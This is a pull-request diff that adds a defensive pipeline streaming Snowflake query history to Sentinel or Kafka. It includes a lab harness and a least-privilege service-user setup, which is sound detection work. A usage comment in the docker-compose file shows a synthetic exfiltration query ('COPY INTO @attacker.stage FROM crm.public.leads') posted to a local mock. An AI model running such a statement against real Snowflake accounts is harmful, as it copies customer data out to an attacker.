Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 6 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
Expand Up @@ -62,3 +62,9 @@ venv/

# Nested git repos inside CVE dirs
**/.git/
.pytest_cache/

# Terraform local state
.terraform/
*.tfstate
*.tfstate.backup
2 changes: 2 additions & 0 deletions CLAUDE.md
Original file line number Diff line number Diff line change
Expand Up @@ -180,7 +180,9 @@ The report at `reports/snowflake-platform-assessment/` is a set of linked static
→ [docs/analysis/apple-mie-impact.md](docs/analysis/apple-mie-impact.md) — Apple Memory Integrity Enforcement
→ [docs/analysis/vishing-2026-market.md](docs/analysis/vishing-2026-market.md) — deepfake vishing economics + healthcare targeting
→ [docs/analysis/snowflake-platform-attack-surface-2026.md](docs/analysis/snowflake-platform-attack-surface-2026.md) — CVE inventory, UNC5537 analysis, Cortex AI/Native Apps/SPCS attack surface, chains A–I, Trail vs ACCOUNT_USAGE field mapping
→ [docs/analysis/databricks-vs-snowflake-platform-comparison.md](docs/analysis/databricks-vs-snowflake-platform-comparison.md) — Cross-platform primitive map + chain mapping; detection-reuse notes for defenders covering both platforms
→ [detection/snowflake/README.md](detection/snowflake/README.md) — Cross-chain Sigma/KQL/SPL index, streaming ingest pattern, connector-debug-log secret-leak detector
→ [detection/snowflake/streaming-ingest/README.md](detection/snowflake/streaming-ingest/README.md) — Concrete config (Terraform + Function App + docker-compose lab) for the INFORMATION_SCHEMA polling pipeline

### Research Docs — Methodology
→ [docs/methodology/callstack-spoofing.md](docs/methodology/callstack-spoofing.md)
Expand Down
10 changes: 8 additions & 2 deletions detection/snowflake/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -56,11 +56,17 @@ Splunk (SPL):
`SNOWFLAKE.ACCOUNT_USAGE` views have up to ~45m latency. For real-time
detection on the chains above:

- Ingest `INFORMATION_SCHEMA.QUERY_HISTORY_BY_USER` on a 60-second
poll instead of waiting on ACCOUNT_USAGE.
- Ingest `INFORMATION_SCHEMA.QUERY_HISTORY()` on a 60-second poll
instead of waiting on ACCOUNT_USAGE.
- Where Snowflake Trail is enabled, prefer the Trail event stream —
see the field-level mapping table in the analysis companion.
- The
[`kql/streaming_query_history_pipeline.kql`](kql/streaming_query_history_pipeline.kql)
hunt is the Sentinel-side projection assuming a Kafka or
Event-Hubs-fronted ingest.
- The polling-producer side ships as concrete config under
[`streaming-ingest/`](streaming-ingest/): a Python poller that
drives the production (Function App → Event Hub) and lab
(mock-Snowflake → Kafka) pipeline shapes off the same code path,
with Terraform for the Azure side and a `docker-compose` lab
harness.
67 changes: 67 additions & 0 deletions detection/snowflake/streaming-ingest/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,67 @@
# Streaming Ingest — Snowflake `INFORMATION_SCHEMA` → SIEM

Concrete deployment shapes for the streaming-ingest pattern referenced
by [`detection/snowflake/README.md`](../README.md) and the KQL hunt at
[`detection/snowflake/kql/streaming_query_history_pipeline.kql`](../kql/streaming_query_history_pipeline.kql).

The pattern bridges the latency gap between Snowflake's two query-audit
views. `SNOWFLAKE.ACCOUNT_USAGE.QUERY_HISTORY` can lag the actual query
by up to roughly forty-five minutes — too slow to terminate an active
bulk-exfil session. `INFORMATION_SCHEMA.QUERY_HISTORY_BY_USER` has no
propagation latency but is scoped per-account and requires a polling
loop on the customer side. This directory documents that polling loop
in three deployable shapes.

## Pipeline shape

```
┌──────────────────┐ poll ┌──────────┐ publish ┌──────────┐ ingest ┌──────────┐
│ INFORMATION_ │ ──60s──────▶ │ Poller │ ──events───────▶│ Event │ ─────────────▶ │ Sentinel │
│ SCHEMA.QUERY_ │ high-water │ (Python) │ per-row JSON │ Hub / │ CL connector │ custom │
│ HISTORY_BY_USER │ mark cursor │ │ │ Kafka │ │ log │
└──────────────────┘ └──────────┘ └──────────┘ └──────────┘
```

The same poller drives all three deployment shapes — the difference is
only the sink (Azure Event Hub via the Function App binding, local
Kafka via `docker-compose`, or stdout JSONL for ad-hoc testing).

## Deployment shapes

| Shape | When to pick it | Files |
|-------|-----------------|-------|
| **Azure Function App** | Production, customers already on Sentinel | [`azure-function/`](azure-function/), [`terraform/`](terraform/) |
| **Local `docker-compose`** | Lab harness, integration testing against the mock Snowflake at `infra/lab/mock-snowflake/` | [`docker-compose.yml`](docker-compose.yml), [`poller/`](poller/) |
| **Stdout JSONL** | Ad-hoc test or third-party SIEM with file-tail ingest | [`poller/poller.py`](poller/poller.py) with `--sink stdout` |

## Service-user requirements

The polling service user needs the minimum:

- A custom role granted `IMPORTED PRIVILEGES ON DATABASE SNOWFLAKE`
*or* `MONITOR ON ACCOUNT` for the warehouse the poller uses.
- `USAGE` on a small dedicated warehouse (an `XSMALL` warehouse on
`AUTO_SUSPEND = 60` is sufficient for the polling cadence documented
here).
- A network policy restricting `LOGIN` to the IP allowlist for the
Function App / Kubernetes egress / container egress; the polling
identity is a high-value credential and inherits all the Chain A
controls.
- Key-pair (JWT) authentication, not password or PAT — this is the
service-identity hardening Snowflake recommends post-2025.

## High-water-mark cursor

The poller persists the most recent `END_TIME` it processed so a restart
does not double-publish events. In the Azure Function shape this lives
in the Function App's storage account as a single blob; in the
docker-compose shape it lives in a named volume.

## Containment note

This is a defender-side tool. It does not require the `EXPLOIT_LAB_ACTIVE`
gate that offensive modules use. It is safe to point at a production
Snowflake account, given a service user that conforms to the
requirements above. The local lab harness points at the mock Snowflake
service at `127.0.0.1:9600` and does not call any real Snowflake
endpoint.
66 changes: 66 additions & 0 deletions detection/snowflake/streaming-ingest/azure-function/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,66 @@
# Azure Function App — Snowflake Query-History Streaming

Wraps the poller at [`../poller/poller.py`](../poller/poller.py) in a
timer-triggered Azure Function. The Function fires on a one-minute
schedule, polls Snowflake `INFORMATION_SCHEMA.QUERY_HISTORY()` for new
rows, and emits to Event Hub. The Sentinel custom-log connector picks
up Event Hub messages and lands them in the `Snowflake_QueryHistoryStream_CL`
table referenced by the streaming KQL hunt.

## Deploy

1. Provision the supporting infrastructure with the Terraform at
[`../terraform/`](../terraform/) (Storage Account for cursor state,
Event Hub, Function App, Key Vault for the Snowflake private key).
2. Upload the poller and its dependencies:

```bash
cd detection/snowflake/streaming-ingest
func azure functionapp publish <function-app-name> \
--python --build remote
```

3. Set Function App configuration:

| Setting | Value |
|---------|-------|
| `SNOWFLAKE_ACCOUNT` | `<account_locator>.<region>` |
| `SNOWFLAKE_USER` | dedicated streaming-ingest service user |
| `SNOWFLAKE_PRIVATE_KEY_PATH` | path to mounted Key Vault secret |
| `SNOWFLAKE_ROLE` | minimum-privilege role with `MONITOR ON ACCOUNT` |
| `SNOWFLAKE_WAREHOUSE` | dedicated `XSMALL` warehouse |
| `EVENTHUB_CONNECTION_STRING` | from the Terraform output |
| `EVENTHUB_NAME` | from the Terraform output |
| `POLLER_SOURCE` | `snowflake` |
| `POLLER_SINK` | `eventhub` |
| `POLLER_CURSOR_PATH` | `/home/cursor/end_time.iso` (blob-mounted) |

4. Confirm liveness from the Function App logs:
`[poller] published <n> events` every minute.

## Snowflake-side setup

The streaming-ingest service user is created with:

```sql
USE ROLE SECURITYADMIN;
CREATE ROLE STREAM_INGEST_RO;
GRANT MONITOR ON ACCOUNT TO ROLE STREAM_INGEST_RO;

USE ROLE USERADMIN;
CREATE USER svc_stream_ingest
TYPE = SERVICE
DEFAULT_ROLE = STREAM_INGEST_RO
DEFAULT_WAREHOUSE = WH_STREAM_INGEST_XS
RSA_PUBLIC_KEY = '<pem>';
GRANT ROLE STREAM_INGEST_RO TO USER svc_stream_ingest;

USE ROLE SECURITYADMIN;
CREATE NETWORK POLICY NP_STREAM_INGEST
ALLOWED_IP_LIST = ('<function-app-egress-ip>/32');
ALTER USER svc_stream_ingest SET NETWORK_POLICY = NP_STREAM_INGEST;
```

The role has read-only audit visibility and no data access. The network
policy on the service user closes the Chain F replay surface for this
specific credential.
14 changes: 14 additions & 0 deletions detection/snowflake/streaming-ingest/azure-function/function.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
{
"scriptFile": "../poller/poller.py",
"entryPoint": "main",
"bindings": [
{
"name": "timer",
"type": "timerTrigger",
"direction": "in",
"schedule": "0 */1 * * * *",
"runOnStartup": false,
"useMonitor": true
}
]
}
16 changes: 16 additions & 0 deletions detection/snowflake/streaming-ingest/azure-function/host.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
{
"version": "2.0",
"extensionBundle": {
"id": "Microsoft.Azure.Functions.ExtensionBundle",
"version": "[4.*, 5.0.0)"
},
"functionTimeout": "00:00:55",
"logging": {
"applicationInsights": {
"samplingSettings": {
"isEnabled": true,
"excludedTypes": "Request"
}
}
}
}
103 changes: 103 additions & 0 deletions detection/snowflake/streaming-ingest/docker-compose.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,103 @@
###############################################################################
# Local lab harness — Snowflake INFORMATION_SCHEMA streaming ingest
#
# Spins up:
# * mock-snowflake - infra/lab/mock-snowflake/ on 127.0.0.1:9600
# * poller - detection/snowflake/streaming-ingest/poller/
# * kafka - bitnami/kafka KRaft single-node
# * kafka-sink - confluent-kafka-python consumer that tees to JSONL
#
# Brings the streaming pipeline up end-to-end against the lab Snowflake
# mock so the KQL hunt at ../kql/streaming_query_history_pipeline.kql
# can be validated with deterministic input.
#
# Usage:
# docker-compose up --build
# # in another shell: post a synthetic query to the mock
# curl -X POST http://127.0.0.1:9600/api/v2/statements \
# -H "Authorization: Snowflake Token=lab" \
# -H "Content-Type: application/json" \
# -d '{"sqlText": "COPY INTO @attacker.stage FROM crm.public.leads;"}'
# # tail the sink output
# docker-compose logs -f kafka-sink
###############################################################################

services:
mock-snowflake:
build: ../../../infra/lab/mock-snowflake
network_mode: host
environment:
- EXPLOIT_LAB_ACTIVE=1
healthcheck:
test: ["CMD", "curl", "-f", "http://127.0.0.1:9600/health"]
interval: 5s
retries: 6

kafka:
image: bitnami/kafka:3.7
network_mode: host
environment:
KAFKA_CFG_NODE_ID: 0
KAFKA_CFG_PROCESS_ROLES: controller,broker
KAFKA_CFG_LISTENERS: PLAINTEXT://:9092,CONTROLLER://:9093
KAFKA_CFG_ADVERTISED_LISTENERS: PLAINTEXT://127.0.0.1:9092
KAFKA_CFG_CONTROLLER_LISTENER_NAMES: CONTROLLER
KAFKA_CFG_CONTROLLER_QUORUM_VOTERS: 0@127.0.0.1:9093
KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP: CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
ALLOW_PLAINTEXT_LISTENER: "yes"

poller:
build:
context: ./poller
dockerfile_inline: |
FROM python:3.12-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY poller.py .
ENTRYPOINT ["python", "poller.py"]
network_mode: host
environment:
- MOCK_SNOWFLAKE_URL=http://127.0.0.1:9600
- MOCK_SNOWFLAKE_TOKEN=lab
- KAFKA_BOOTSTRAP_SERVERS=127.0.0.1:9092
- KAFKA_TOPIC=snowflake-query-history
command:
- --source=mock-rest
- --sink=kafka
- --cursor-path=/tmp/cursor.iso
- --loop
- --interval=15
depends_on:
mock-snowflake:
condition: service_healthy
kafka:
condition: service_started

kafka-sink:
image: python:3.12-slim
network_mode: host
working_dir: /app
volumes:
- ./poller:/app
command:
- bash
- -lc
- |
pip install --quiet confluent-kafka &&
python -c "
from confluent_kafka import Consumer
c = Consumer({
'bootstrap.servers': '127.0.0.1:9092',
'group.id': 'lab-sink',
'auto.offset.reset': 'earliest',
})
c.subscribe(['snowflake-query-history'])
while True:
m = c.poll(1.0)
if m and not m.error():
print(m.value().decode(), flush=True)
"
depends_on:
kafka:
condition: service_started
Loading
Loading